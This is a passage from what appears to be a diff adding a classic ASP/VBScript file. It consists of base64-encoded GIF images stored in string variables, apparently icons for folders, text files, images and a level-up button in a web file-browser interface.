+"GTBj5piE2MkpXg8iM8C00vRUn4pR8LkmqqlliEyl5PBjyIQgmkepo7Ye9OKotwjnYboe9BhCu+6OOA1PCqloiIIMcBsFlrqJ64aOuLBUCzOhfDjjkppV60aReoCGEk/rDJdBeAQALCPBvynbJb5CdEUYJRuf1/EcA5PckX5ceJmIyQI5RJ0h2EgBMW3mPJImIojpJUwPOIMHknrF0LzwO0XLQgnFSJvS1UdMo8cwei5HfcXUwkzXm0I9" &_
+"mKF10kE1xhtGtYw9TtD8fmRIQLRkrTYaSltWGi39zS2N0p7pfZDFJ2nk9+CESxABACH5BAAFAP8ALAAAAACgAFAAAAT/EMhJq5XmpHQIOZ0jeI5xnWiqrmzrvnDaaFsy3MrxMIlHNrGgcEgsthoCBWI5sN1uOwbPAzoIDAujdsvtTgrOpfg5QAykUoVaTRC4gd64fH5phMWIgPm2RKfXVm4CdISFXQJPeHl6fAhoOGsKbg5tBgYFhpma" &_
+"LgyLAXpLn3t9UpBrIz6WlpusrRMLA5+yop6NjwORHT4Eqquuv4axs7OhAXxnpQm5u7y9mMDQcQLD1Hl7A1F/arq7vVcLBXDR40QP1MNjuDo8B4CUu1cGggIL9c/k+DDn6AgKVCGUcrRBlUrevHr28ilssW9WgnsWkAjqZmkeFoQLxC3caMFcwwEa/08skEcpnkFBFxFC5MgSwLSGDmD0OvkNY72WOCUIowYyhjc3KW3mxAmLZ5YgBSpa" &_
+"sqlyaE4BHgc4CBmkAVOMVJ1qJVLgKritYLd0tbkyrNmqBbqGO8u2rdu3cOPKnUu3rt27eOk0SAsua96zYzGW/Rs2MFnCbK16zYiYAtQ8DKZyNMx08N2iwwYcVUiZaWMAOzP7BTa2YjyEjV/ui8l55DygXxF73MdgYQOaFkfTbShrYYHXry3X5f1poWngvuwiUcCHd22FP4GquguGjKdzrPPN3G6irh0yNz7qdqWKYKXkcxGBD290Y1Jm" &_
+"qYS3Zb6+0Sep44G9g0/gbn3wQy1gHv88m831HxlDGbQfASJcIVcGGxx4QwJDAQccXDPUkEAn14A3yFMjtCPQPHDRoGE6ZCSQ3zgCiJiLCN21ZYCGNTzARIry5UNAJLnQ85aJNG74RAICrDiOATvyuEZ/bwUZpFmoKKlGdmYhecANPDhJYVi7gACIB2c18AEIKQZ5gFlUJLADB7ucNSYITkxI44dgObChH1MwWGUVVZCR5QYHGKnQAXii" &_
+"0UOMW71ZBX1yciCodusUysCZWsnjgTJ8VuEEB0W6CUI2aDzAZE4NLLjDA5ny+eOiajLwQA6U5rQgAXeimuqobGmQYqYJwkdoGqkialYDDNQHK64sDXipFLZWgaz1WYT+B4KwCrm2DXx38knAoxvNGCd4PbAkkRuR+MpBB9SGZYci4DHArSavuegPM1S6BYYiN56x5UYCzpPktd3E9R2+S2jomyUkzCPvLvW2dcB17AIKnSrwTOKiD5K9" &_
+"hRk/YmxAJzB7uUZxxW584E8JcoXGMQKORlOaRfS+lm5bqu0jRqAuI4TbgK8VCNdsNjvybheK1YMcM68NR9wNH/9imIVI+jDP0DgRZ4yK4xi2c0UeuOGzXECf8xA5WiOnSo5v1UyNAlR7QRluvSCmsiw94VO0zihNh9jGdH+ds01KXfKZBFDdl7FvlQ2eGF9rKe7445AjFgEAIfkEAAUA/wAsAAAAAKAAUAAABP8QyEmrpUYQ4kT2yyWO" &_
+"ZGmeaKqup0EcT3JsinJ0guMYfMH+wKBwmGq8YIxkola7bTY8HnFKrVovR0UyORgwbU+CJ2NYFBrXtHo9Mii63S2ju1QkEmGxYG8o+NmAgVQNBwlwAwgIW3A1d2EHe3x+f4KVlimFhnCJinNdjXhPkJECk2eXqKkVBneaXZwDnl52oS96kaY+qruWDQmcia+cso0zGzekfaa8zIAFv8ABCMKdA3UKeaQeuc3dV76I0dLCSQ9NDmHaAmbL" &_
+"3u5EAtScAeN0eDh7Yjyk7JNo7wCBvJEH7JMBEQX28eg3KaBDFuHo0QOGQMa/ErkaPtx4ogACiSD/gR24aKKBKZIcU14YALJlIgYoVcoc4qClywECZuqc8sBmyAQxdwpN4bOlrqFIVRQFmbRpip5LGTgF4ODBRwYOgiKtudRB0wIsWw44OjWszQFaZZoVm3Yn2LNkhXIt6nXqhKr0BmR1CrWoVLuALSyVGDhwAwFvBtMrbPfZpsF/GScF" &_
+"97ir5KbxDiEqivZy0oGaP4qN61mn5kOJ8u4tjfT0adZIDWRyfSgB7J2EWiVgEMx1ztszM+mGpRkocJmsdN+xOq026WYm/R0HIFz5bjgJVr/LSOm2descuWuE/V35xuji2zZ1cQBJeRkbxbcrbKR9e03lfzuUPz7wEfsHYKfc/0jx8ffcegDaNxADuhFY4AL7jMEOY/8lWEgMMgigHnQQqrPOhjtZaKFQH6hzEGAZEBCDDSIe4FaJ2vQx" &_
+"VQPobLAbA+ZYSMBOUcDY41Q1HrPFAxaeOFOPSEbhlAt53MgAi+3tyGOKT4whRVNBhnGjDFGC+A6TeRCgZFNhipIAkWIipUGZYh7IUYeIGcNmUwusWaZ+Mx1GygE1sFlXbPncKZQ6BDBRppFDkZIlDjvVqQ6fYITxp5ovNHHLHjx66ACkknrpECFfnMOHTAkxiQ8ptnCA6FaQhjpKCCn1mI6HgTEZqqF4PoRkNjH6d6YSrnqqSqlR2MmB" &_
+"NrA6ZcQDcsTCxNUMKiUJ5gbaAPYCs3IwGMZ5fvCxa5WRCKvrfdkmYcyk202STI9r7pHsVAMFk20oq3qTi49J0hfgJi/JwcGn967bo5tDFRJav0lol64pcHo7pl1GpNZbOLEQWWAuDf/oVFUfUTSRZu3V6454EJIh41drSZTax3BAe7F8gKUckmj1DECAuJegxx3OAc1V1DzN2aYSf4D19TMwd+T68nxTKSYN0g7KpDPPDzlNUdTTPWS0" &_
+"TyJRnXUlPtvUnDVef12JzCxbQ7DZ9soctMJsc4RXAHqVHbdkEQAAIfkEAAUA/wAsAAAAAKAAUAAABP8QyEmrtcVos4ovzSWOZGmeaKqu52IIBCFoQt19bK7vfJ83NVgsFrR9Cr6kcskcvQ6Kw3BaNBxDzax2e2o4CFCFIpEYHg6OoPXIbbvbX7B4TI6dZcEj8s3v9wxDc3QJUmcHRXp+iospBAkPDAMJYmR1hmqJjJqbEw0EkAyRAwOD" &_
+"ZWB4M1ecq4xgoKKjg3ZpRjist3wGZwmhoaOSdENBNx64xm4HowgIA72/YkMaxCDHJQIPCAEMDljVJA3Jv8sIzqSHC94qBQMB7e4De+kXBwm/ysu9293yJ+zu/wP28QNggIy9e80eHBiYQsC/hwEcMJxAj9fBX2cMTDzxAOI/Bhv/AfBaFmDZQSkhTXh8uLHAOJIl7REQmHKCAAX+VrbbmODluJiSal4oUE+ZTm0TBdzzySyBAKEWihrV" &_
+"KZEhzgFMxx2gWVPpwWweA060lxUB15pXv0KEt/Hiy1FQLVwUB3YAt5AKYJr8lSCuBF09mc2FW3MdRMEDnkIFV+ntxb41cz5sepZhRTIMHNtTHNKhTrZQC1Yio3lUgsrpOuoEGfdyJWzj+MYLeXRn3NG4MzcVgFpe7QA1AZ1phhu3XwmqV7Ke6MlQOEnFCR0H4Hll1YlgnEuNztmvZIC9celyPnwUA9xbpwMw/BA0dvJn0o5Or17CtXZ2" &_
+"wxuDrx36If31TcQf/3kBBvhCDGIMiFKBx3kxxQEMKMSfRgz6FccUvEjoHAEV+gXIFEPwEoUhM3UYlxAg2jEiARSaCFWKKbrolws3RQFjDDIKBUQQYSgA43U5blQEDIKk2GKQDC0wpAA9SjEEkEgO9MKQDvT4JIBRrrJkEHIQ4MCRzKlS4ZZDQqWHLdNloIEDtGwJ5kRnsnHcBjQQsSU6KTUQ5wdYVkPnBsIsKdSecg76J6BeDtnnLQW4" &_
+"MKU0aAZ36AYCtImnUDQueUNNehZQw6QbqDflnbMxdEQVk6Y56pIGLLqJHqumOueqQ74pT6cfxPpnqUJR6mZIZ2b6KZ3qoZjosLamE6ewxDZobN80zcK5LA0a8CpUDRdOsYG1yhJaTH1K1gDjDMmmg2ucrqZTZYJOajsoofV5IcgcU0AJbJwBfjFvgkX4dW663jjwiGnz4lFulsZ4wgsspMxxiACXIrzJNdno81c4zPjyzBw1SMwJe/8w" &_
+"sxdW+MAyiRi8ebzJdyFnI/I4GjfMocqaVLcSWD4100sMB9PMRXI3u+NTPl76rMlvYMUEcygJ3GX0IkgnfQ8kD9j7NB9AewRTAPbccXXNtf2EGCElfs0Iy0KXxqLZr7L88jhk0Mc2J/eVhBjJCqU89zE3maa3EhEAACH5BAAFAP8ALAAAAACgAFAAAAT/EMhJq52t6NKu/2AojmRpnui0rUXqvnAsu4Uh3MbCznzv/yKD8EbUbTrApHKJ" &_
+"EtqIxRVz6nE8EAGGA0mFGQhgggMqMEi73cIgwG4PWmhUQxAmHA4E8jnOXLf/A1x8Izd1d3hQe4NADn+OAQ6LIwuFhndjN0eSPXMKA1iPbQybIQ4HCgkJeHZ3eZkapDMFCQO1oY6xFw0OCr2pqXiHOLC5MA20tX63bMUVDgS9vr9hB5mCzSgCybWgt6PYAF920ajAYQbgMZ7b3aGR4HTj5NME6OkpBgcJCAjbn7eB0tlJ8KBWAnIKbtyT" &_
+"oy8VP37sHr1Jd4yBRQbJyAm4tlBEQ4cP//sl48dmwJZ7BBJctJhRAYGOJwz8SsUgpL8BAmDmU7ByJR57MEl8/BVSpEGO2Fg96GkxwbugJGb+uvIwWQI4HQ8dWNrzAVKoFb4cqMVAqkqICTZC1efP4gMFB8CCaMBqrFWzceU2wHgTLh65H+qyvTszp9wDfG/eAQqYQj6tdsnOPPA1nUxkNxO8bGxB8J11BoFVTvfx5gAGo8FC1opMlVrA" &_
+"UhOfTsB5gg0wB1drrS2Bps2ZtXfVUflA91/eB4o+fKCq9jNDbnUzBrxX+cO0nMXVSWnR76HNtbVZ5+eVc7zt3FV9T91x3XjanNEbUl+P9wR/NmvVlr/dvgXT/si1wP8TrfD3lH8SuAcKRAPAB9McUEDjknzT+SfeI/0YBhMZN5wyYR0HIghAA+38gQB7pFDCoSlwgYiiXI0sE6JlHBJhBxgOVCjiA8tkEVSNZIgIQo/M3FODOJjUKOQH" &_
+"RAZwjxPaucLhkh7wuMw32EB5WxgcLkDlBTHeMiMpR0IJYpBfXqCMIwFlqaUQdUDxon9qSIRVM286Ec8NXqYJghUlnWRZnlD6KWIGGhBaqKH2sfAEoXcyChgLBahYxpuSBkdppThomWltm2owIJSRfgpWqIqYyhmqG6jaKKulugoWoqHOKSs2rN76KqW6+kcrB4euYGuvuG5K7KqoHqsXq8MqO8jzkUTkkKqz6QBpRKzUFvNEjUZk+4MV" &_
+"WGgxbA1AlkGMtzLUySa2FyzwnBg1AouuDGsCwh6E1CCix7wyhBkKAml9tRMqq7SCJr8wWHmLSAx85NdB0fxSMCZCIBxDk5/wg9kAS9UiTSp1OMGuxSM0WdRICCT28Sr1VEzyCwovnF/G20BMT8svw+Avhg+VxA2DHkuD48g5j1BvG0X5nLFRAyDEZ9ExqGvi0lgY9ZDK0VSjIdQ6W8lgSAFYzQ9LTUeTR7Nce3AMflWxc1p3Hh7QZ9o8" &_
+"zMIOeTdxpRmOaNM9lwDrEPTLNnChgqOOfgORzy9+1Ze4pBEAACH5BAAFAP8ALAAAAACgAFAAAAT/EMhJq704682798KDBIzTfGiqrmzrTsUQzPRQvHiu766gDCOacHDiGY/IXCExAAqfAUdS1ShYC8WpdsVsBqEzxtZzLd/GaI6g2QQ/0xqzGU6fGA4JBILtFtYtCwYCAgYGC2VZf1oNeAl5entfYGKKEoKDmAKHV5VbjY6QkH1RnYWZ" &_
+"mZtnnUgGjq6homBElQWmp4MGnKs8BgQHTQyuQKFOTzaltre5Vrs6Db4Hv2yvxMMzAyarAgTcBA63VonNLdDRbE2OIpDTqp0N293RBKfM4y930ebnwY7DAwkCxFUa1I2bPEy57OEoF63LNFcAFQJYMMhBQYPfNElcIYhbAgX5//Q9dHRA4KpL8C4SKLQxRQOL3R4weBDyx8iSG0+pXNkyBcxuCRjMDIkH3YGALbcdUADyQEEpPT/0unhA" &_
+"KIOmIQ1EBcCIqVeQGbVu7ZCyYNChIQmMdbD0K9OjGsdy2OlRaFqT9qa69TpProZAPkDuxCNP7NaUe0HilfsOU1sFO6H6BUD1sdPJF3R+VWnYr8EEMhM47Ya5AsVTlp+WBuDgrNVg3CSvRomJLd/Yi3tWfW01Ac/VEm5h8gXZQefJd2Tytgt8gvBTzSVAU/76gdrStQo5yCj8eOmaoGc2LV2oPLznC6IDyOfwXz7M5eN3E66ess1zTSBP" &_
+"zh6/UOxTucllAP9++HnXU3/9CcBdevUBsAaBbAiAHIL9NVhBURCKNlYVBeBCIUsWTuAKA/u4slUZKH0YoogQtehIVGbQhmA7FjYyjB7/aNgShygiVOGKlqgDCwIPSNiSHAUA5iGIQHJ1IyyzHIlkdoQk1GRwTxJj5EZTlnFlBfdV809PXerypQQQ4tcTj0gG2GCa58DY5ZkU2KTHDDiOKaccdFKwhiR4DrDlmoj0SUEDgNKAgJuG9iTA" &_
+"KLI1itkDo1AiaWmjzHDpapkGsGlplPZh6adyPdpHpKRuJYMsjKbaTAxQHOMqZiFck82suOaqaxohjFBCq7sqAqsxNAZrz6qxAmssGqa6ger1sp2E6sYeACkL7RGdstMCm9Zem+003QIw5bUoSAvGHmxQe1SrZZILwijohuIKTnFcUkgq4bjbAbJPxCvvvIslgwm+xeprwbBCoJvliO5589PDt+BrMFmh5pklAv2wcUBobZHkyzyZLFPP" &_
+"xGThB2V7A1A3AFOuQAMyLl6S7EF7sAR1DgJWoaPAvNBwJ8AV4bq7RLqQPIDyADnnB5HLmZgpMwh25nh00isvDQ1CIz+twicov8bGzi3Ph0vQWnP1yTk7U82yIwWVVzYOd9gs2lJJf8TyaPMw+XYODKn81QE/Wbm3M30HYxl3ZA+uQS/ybNfNgoqvGAEAIfkEAAUA/wAsAAAAAKAAUAAABP8QyEmrvTjrzbv/QCMow5AcDxIwTgO+cCzP" &_
+"tGYcyVPuauD7g0JtSCwaPwVcIoFoIga932/gOlqvWJkyAXVGpT9HdkwuAwwE3ICx9H7BPoZ5Tqc10ofDzuSGw+uAgR14eXtdTn5ggouMBgJpCQp5ent9iXGMmXQNDgSeCQwMD4WVlolimqljnZ4ED6GiaqWIiVRzDQW5BVWqY2itrrAMkoYpTlBwQXO6zEK9WaytoLAnJDtLeycPQC3LzczPRwuOkgetB8IMk1wPJwK8i7jfuvDhMiIC" &_
+"+Qr7CtLCk+bCzWtmr0a+gwf49fsU6kQeAvU0FTDgSABFggVlLDiYj4BCc57/cEgiYKBgRY4CFujKKOMkQn4gPaHK6BLlSpYwUOZzkHBfq24ZJ9Y8aGAXTiQUZepM089BSZwUh+YretRD1F+edFqsKuGqVgFcOVx1BEzngrAUH/2c+jQsBqFXgTlA6RYrMJIU3WYYG7XswYgs1d71RFXvBb5R1eY763bj4FZgDU+QV8Ai4qiSz3R8HFly" &_
+"s4qX2+rlGI3A3M56v51E7MzwV46SKesax3ZsZs1MRxL1PI+2Zcy3byjcd2Au49QDx11tndnBcJio3Q4Ed5vCr+f7REufnqs6hWh5YJrOLPsbYMmP797m7p3CuRxsYlYf2P47gWnCEoyvLvt8cPzpJKBd/30EdvVKOqE8MGCB9aVxoDCjEMDghABMogB8D5RzAIUMAuThJBwWiAcX1zwUIoEGWGPIAAoseKJhDTCwYgkM+PciWiSumEB0" &_
+"NxqmhIw7sHFCj9UtYeSRRhJ525GHPLGEkpnhYIwbCCjAoAMprADUf1Q6UWN9BQyQDHOSMdHlEzxKJqYftix5ZgkJtOfAJQHMpGYJXhjS3jaXyHGbIU340MQA7dEJhAnv6KXiGwEgQKZhhgaQzaOB4VmLjUfxmcgT2WDaSwNM0GmnYXNewukeaQbFqBR+/rnpjHG6Fal3YcJxainueKrJrHLyOSigThh5AKXPaOpHqwSqyIMXRx6g6+ki" &_
+"pZ4yoQAr5olkqr2smcyzYYE6SxNHAmmOixJpOwWxtOboRTvY7DAJRBlhyQ23MI7QhQlGGgKQhFBWtcUSQLqbUA7FkduvJgYgaYg21MhE78Fz/Kvvg6GEdABRY9EDcR1J5LvDPgh65JNgLqnU3cZ03ECiQwCy8dFdNt2EcsoAUTzMcMAUx1FRuTw8Mw2EUByJQvpZTMDO1P1sxh154KffcEUTEvPJSs+BhgLxeTJcTJNMjW7V0OQs3jnm" &_
+"IC0z2LeAR5wDpelMlMZoA2IAK2VvBhlHScctCD4HtVLy2Xov4ttvUcEdOJQRAAAh+QQABQD/ACwAAAAAoABQAAAE/xDISau9OOvNu/8GcRyEmJzPMCRC871wLM/024ijog4P4iO7RKFGLBqPMYOAkHgoRrvBb4oIBBgOF3LL7cYajtKBQX4kdtWpdW0dLLzwuFwSLiXI5Gg14GP7B1pzgoMwC0oETyUPeAw+Kmt9fmwOhJWWGA0CmgIH" &_
+"Cp4Ei3iOA5CSfgyXqambmp6ud6JAUlZ7pmuquIMLrAKuroxSKmm1tgG5x10FBiEEDpudvrBkslKRxajI2UXLyyUlmoi+THhnKj3WppTa6zLc3d4EmtCfJg8kJijEbIDs/R/K7uA1E+BgnrcsGBaQ+vPGn8MN7pYtgbcJRzMDHAQ8aIPwoccKDf8KFNAUUSCvjyiLFFjAklVAb6wCpZz5YiVLQy65TdTUkKZPDw1uslSyKaKBIT+TerAp" &_
+"lChJdylDriwgU2kGpk2LckuJlSVSq1eFNlWy7KvHrjfNgq2AVqhaj0HFCq26VkJcuSzpPmybtu4Fvm/P4hXq96/cwIIlClhGuLAFqQuoJlXGi2dkx5gnOK28QG9mq5Qrk/yMWadojKQLR8yJOnVdo0Zd+9VJcavstcoEejt6u24d3QR6r90FPF5P4T+J/h64GLlS0Sd9aqyCxbPfitBIbKKpUJKb1AYK+vJ0wEFrlAu9Wwe7YN74A8c9" &_
+"CigWQF1mA+PHn/e48RrpJfl9Yt//R/RZQZo3OZDnzUwFGvNZcfDM1J8tQLCwnnRiNMFAAvcMKB991Aih2jiMbEjAfh6l5wc1KiRwYVTSlOgidyrSEsUOAsx2QCiM2IPiRxrRwmIUCfiFgwIaOjFCcErd6OQAfo0g5ZRSWvWkHicc0IJSVJbT4gFW6fDkDydkiZhHRz7JwJnyjelImVm+yI4BUKh5gJzsNOAlGj7AWWaOPzFx5QmA/lTA" &_
+"nj+Y4SeHSTWQgpNlgqlUJmJWuGiZSt3B5w8rFHbpCQyoQMKPD5V5DhUIsDnTAZdGISUBeB7DagKokhmrQwYsSuSUTKKUayO1qlAoWLOC6iqVpPZzQK2jFFlX9QHFRvGElEgmcNFHBdQKCQK3PkRnORxOyeNB3VYiDDprfOcYlSPwyAA8HrIj5iym8FMYDtQyYi08yR4jgDD0xWsVnVPGeA++i8WHjJ702oLNveKS440vMbFzaIOY3SBl" &_
+"KPuG48omDphXVjYNYHwfPge7p+VE8bjjVblHTGjKw58xg6A4LJewWV+rBCzbcr5ouVw8LvF8SY3pwjwTGBOT54xAKxc1VyrdMSTcIUtWZBIvbuESZAADdOTcLqwI5AzXjTnXDy9bF5222utkAvJulRnQNdz+4ETQYoptIpbSeBPiDitiqRp4NgBxU/jhjYoUGeCM3xYBACH5BAAFAP8ALAAAAACgAFAAAAT/EMhJq7046827/5MhEITj" &_
+"EMdBGGDrvnAsb4vopCSRMI9yJINB4iBozI7IpJLTEDgFB4VUx6g+gtjE0Ljser+dgmFschKk0l2VgUBgBwztgQuu27vj8YgERSuCVQNtWG2Fc3eIiTB5Yzkkfn9wbINtAQGFCAkFipydGWKMjjp+gJNuCJaXhUJ0nq6JDWJOeaKQpZipqoMDAq++dwULC0+zolFoQFW4qai5A62/0UjBwsRPxn4PgW65zbkBAwvS4zMNwsIixAaiN2hU" &_
+"VwPM387Q5PZh5zXWAuskDmYqSpw4IOjSvG8O7in0QO1cuid6/jkRd4FApYOpGCzcqKGhQ3Vj/zo0AIIxF8eTFjw6TGdgE8MEJVOhnCnBXL6b9ZjEK6mR5kyV51y6EBAzoc+fNxcIfbFz3rOjNGMFK5ATxIKmqcJB3apEwANLAxxU5Uq2rNmzaNOqXcu2rdu3cOPKXegVFQOxc9VedUoxLwapSsf6wkrP7wWgS6URLWnU8ASgwhL/+srT" &_
+"8QSbSYUJ5hTTkmUJkIOS6xzgM4DQ58hRxuhGSBG/qIWRW8z6jaa81PTwMxDZHmFmb4Ik2IzW3ENiC4gr2vutdXBeeY+ro0t513Mhc2Xt4yfZ9/U3cxmBDMnxe5A2Q167ZcQ+z8lIwTFp2bJej6PdLDgKeI5JyPxDbDUiCv8J5G00UnyFzDdfL2wVMKAj3dlTABDnFfKAgnK0tcCDOfTFURN/DIKhgm2JwCE/UI04YltPnJCDRAz69IOK" &_
+"OzyAQ35nbWcNVAbQKFwKOCjH0UMoSKECilDNqCAWQAJJwFnDtAPJATj61ICSOwThQ5MpVMlVH5BI0RiPM8bBZZNPmmVAmFOscNaZQCqQwAMleOnTCMcY+eKbZyqgTRUvCkmOMXOamWZZKHD5ZxyOjEmTI2qsEYegChnApQKSBpSDnSftEamkCRxKVqIpRBoqOzyiIKmkPnBqJal/njrgVg58uoaNKqC1zgEXaupICrN4+KGtwQ2n1h4D" &_
+"GmkNpa5EUajndUEAeFY/tUyxz0ykfkcfWi7mcAwR+whbaanXxZFAjGY10O0ZPsDohItjRCgNCvzJx+xGJqJAwD6OMGIgAW9Ugkkm8pK1nSjscQRPQQO7Yexa0q27gm4t3WvHjIIsk4oCFi80DDGi8KNOb/b0mMDAB2l1LMj9hksyOT9o7FTH9zRxzabSCZAPzV1cWUhnjkKZ72778CbaPQ9cVJlboOg2cj4K7ffbPHCJZ01SCh1IWlx5" &_
+"XH1Twa9M6M1BPcEFym6Z8QzGlUXBlplSKE0Njto+ITYTc86IKxdgVB3lFVh4mSb44IQXbkEEACH5BAAFAP8ALAAAAACgAFAAAAT/EMhJq7046827/0BhjKRgLmCqrmzrbk1RLORI3CZxKIRjvMCgcOiRzUwmw225UzhvjgZxSq2qjCKkwLEkJBLOcOLxIPys6DQ6ZjRodbfDNzwYMO6KA0Gq7vtdWAVaAgd6XnMKdXZ3D4UEf5CRRViD" &_
+"jodgCYp3inV7kp+gE4FuSHCXiZoIqpwHfKGvfqNaDoZfYJyqq4oJrbC+aWwyC4NMYKh1uQicXwK/zlWBw0hKN3R2yZwDXwfP3UTRNSS0Tne5isnKrt7rLcEF6hQGDgkMugMIAQHJCQXs/moNCODKh04bvH8Ihwi8p69gnWYJIxKRg85cnQQSMwZpcKBivoYD/zRicPAAH4MoIjHcU/WxJYJ+KSUUGNAy3wCYMSegwlfT5kGJNHsGGPBT" &_
+"owCGQvM5iOkgqdKcFBLwTMog5gOnAapClYk1X8yuAbZOAPu160UBRRNedapV5Nqkynbh1NjU6dKUdeFmS5D2X9CeRHP+rRk3G0SRMwHPRTyYYLZdUEnaRClWMsjHisRqzoA52+bPFY49VsULLejNR0evstXrtNhMuHLZ2tbXdcICsJGpejCbmW2xAhKt7r3t92bixI1rRm6LwQBHZ5SLlINcUSFHtaV3M1D94nVH2jVSb279e6Hoxt1l" &_
+"B8VxtqI85vVID2TknwHq2uJ/V04fS0T95qXXn/8R672iA4BP9ICeZgP6h9B98SnwAAOGQFHgbQ3KENGB302YQBdQfGYEDaQIYICGCQX0nQIMfAjiDQvmJMwgSCxm34F5vLjEXWI1IA2NJsakI4iflUjjiSkNieMJYhmpBQkpCaBjGAdocaE3JUxTQ0rUdBEGD4NAVYOUS5gYY0RcMEEljSjERMKQZ6aYJgFUOgCkjF2+eBiXUuYIpAlQ" &_
+"kamjAG0G+ucWZoxgI0KCgohEk38uEY5RiMZB5SNb/fgGDuHEuc4sTXxJWU40ztkpkhGVGOqXPWzVADEwdmqiDFdKIg2dXzphiKcS0ZCDmWPWWN8/Jqwaxo6gnTpIIP+8miuzPXfwgulmymoRSK2RhFrHHdzyJWI4g5zILLE3QMstI9NqBq619D2ow7mb7GKaulme0F9C88BrUX7YriMCKeLei1ADE3K7LzYMndTvL+7QtzAkO5Cx0jkN" &_
+"CXUTVBlKxGE2PE0F2MOwDJgRhAcMVLFdrmIBsiQHmuyxUG2F542KnBD0slAy23dMMmTl/A91PGMVs88zy7ESSygTbV9HQX+s9G253Xzx0xEFV/NQo1Kt9dYcRAAAIfkEAAUA/wAsAAAAAKAAUAAABP8QyEmrvTjrzbv/VFMUi2GaBaiubOu+4EgaQn0acK7v/CuXtSCNQBAYFr2kcpkTjWjBGpHoCDaY2KzWIitAg4TDtBjcms/JblTg" &_
+"OIiJboXiIEDb7yx1NCw+JBJygQ5XeIWGF11fAm5if4CBCgQOh5SUTl5RbmGOkJEEOJUgAg8IAQyDoSs/X2EEnHIJDAMMCQepHQUDAbu8Aym3H6s1DkR/gQPIswwMBITAF7q80gPOzxtOJSbFx8nLy2LWFgLS5AGT4SsNi7Dd3g9uoOgAD+XSDPIsAnLt3nPg+PXIDUggoBq+DcQeeJOFAAGyWgcDTnv46+A1BwqXNXSYjBo+ehL/A3RM" &_
+"YNAihgMKN3ZEdqDkrXESOSarY3KDAT8ruxHEF62czGQJanIgkBMoRHm5fBZF8IeOy5oNig50ZHEUr5/INjqq9dRkrGQbGw4UqmCp1q0thVbwk4BUWLEVDwow63DrH5pqJRj48zYsSZMNEqz0a/doXgkHGPQVOwDvwQKCwTZ8UPjP4QlRFwMVqq7sgLqVLV+WkDXsytFsKzN4Jyae0I4NryIbvbfyQ0ZiuobzXI/paACpHSXDrUntXIke" &_
+"LzcILmuAP+KuD0YNeY42W1rEcRNQyyDkvd8UsmdXG3IX+PDiDyhoKyk6uvIBzk/gg1tBxgRTUH30Ll9v9owMvEGF/1zU9ScBfep5g98YnxzUk0C65dUAffcxOCA+SQkUl4EGhEGZgBaaZJVI+hlogYUhmmigACjCQYcRSKj4W4coykGGFTKORgyDcry4Ro7K7QjHHFWsIUCMQOY1RCtGCpEkeE3++ORoUbJBBApTKtnkGDdkKdQCRo5h" &_
+"RJdeihiFkJ/cYMCGZYajDhhTqHmCiZcUEGE4QBAxppzujdZFF7TxeYIAMtyJ1J+AHiYoFGsmKiGiXRj6jBdyCoHoYZD+eRmfQSyAqKS3dJGNDUcEOmgNnkKalzBG/kbpCamqqtYIQDTZ56qZyvCoIlFgCV6uuq7KqxAmnFfnp5etQcwbRsgHbNKgUmgyBqiHXmpqi0X0Vye11mDSYhVItmkRjWOoB8gB1YlrUbmvyFGiuvJY6YoxsKz2" &_
+"QIMXjFLKKdzCmwMUBHTSzgO3qZdVOb74iwaY63CDjGIyqYRcvwq3UAMkkc2i0mcBbFRgxVt05jBDYpXSsckSfQfyFgHvo4xpJsdW3spmkAugaVehLBHNZuwYi0aM5Vyeyjxj0cCy3jDG8cnlpVs0FgY4EMsDBIN1ssz1JPd0yHwMhjPCbG6dRYcHPNzWxp+ZPMC7YttxU1MGD1RQ23RPGQEAOwA="
+
+img_dir = "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs="
+img_lvUp= ""&_
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO"&_
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi"&_
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk"&_
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG"&_
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA"&_
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&_
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&_
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5"&_
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf"&_
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ"&_
+"ADs="
+
+img_txt = ""&_
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ"&_
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7"&_
+"UpPWG3Ig6Hq/XmRjuZwkAAA7"
+
+img_img = ""&_
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA"&_
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci"&_
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd"&_
+"FxEAOw=="
+
+img_unknow = ""&_
